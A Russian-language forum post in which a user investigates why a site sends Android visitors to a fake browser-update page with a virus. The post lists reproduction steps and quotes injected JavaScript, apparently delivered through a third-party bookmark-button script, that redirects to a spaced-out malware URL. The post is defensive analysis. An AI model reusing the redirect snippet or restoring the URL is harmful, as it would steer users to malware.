Тема: Форум предлагает скачать вирус
Показать сообщение отдельно

Старый 12.12.2013, 17:13 По умолчанию
  #14
kinaran
Newbie 0 Lv.
 
Аватар для kinaran
Show
 
Регистрация: 11.12.2013
Возраст: 41
Сообщений: 4
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении
Цитата:
Сообщение от DESTRODAMA Посмотреть сообщение
для вас видимо слово *надстройки* ассоциируются только с IE.
Поверьте, в других браузерах они тоже есть, только могут называться:
1)Сертификатами
2)Расширениями
3)Плагинами

+ такое может быть, что другие программы, которые вы наверняка качали, содержали в себе какую нибудь такую бредятину.
Если андроид на линукс, то это не значит что вирусов не словите - мир не стоит на месте и утопическая фраза *на линукс нет вирусов* уже дааааавно не канает)[COLOR="Silver"]

Нет, вовсе нет. Android + Firefox мною упомянуты ещё раз, намекая на его ограниченные возможности по части плагинов и расширений. А вовсе не на линукс без вирусов.

Смотрите:
  • берём чистую (наисвежеустановленную) виртуальную машину с Windows и Firefox
  • удаляём ВСЕ куки и историю, для чистоты эксперимента;
  • ставим плагин HttpFox для записи обмена с сервером;
  • ставим плагин User Agent Switcher, добавляем туда User Agent от браузера на Android, Chrome или Firefox, без разницы;
  • переключаем User Agent на андроидовый браузер, чтобы сервер думал, что мы с зашли телефона;
  • включаем лог http;
  • идём на наш сайт (zmega.com) и бродим по форуму пару минут;
  • через некоторое время нас посылает на страницу обновления браузера, что и требовалось доказать.


Лог выложен тут, если кто понимает его содержимое.

Чтобы воспроизвести эту последовательность ещё раз, надо удалить все (конечно, нужны только какие-то конкретные из них, но какие - пока не ясно) куки и перезапустить браузер.

--- Добавлено в 19:13 --- Предыдущее сообщение было написано в 17:57 ---

Вот что нашлось сейчас:

Если разрешены скрипты с сайта odnaknopka (это кнопки "Добавить в закладки:" под сообщениями в теме), всё работает некоторое время как ожидалось.

Потом, через это некоторое время, и если браузер на Android, в конце скрипта появляется новый код:
Цитата:
(function(w) {
window.location = "h t t p: / / w e b w o n l i n e s . c o m / s/14305";
})(window);
Ещё через некоторое время (чтоб никто не заметил :) ) происходит ошибка загрузки этого скрипта и выполняется переадресация на вирус.
Вот такие дела...
Примеры скриптов, получаем в ходе этой последовательности
Последний раз редактировалось kinaran; 12.12.2013 в 17:12.
kinaran вне форума  
Цитата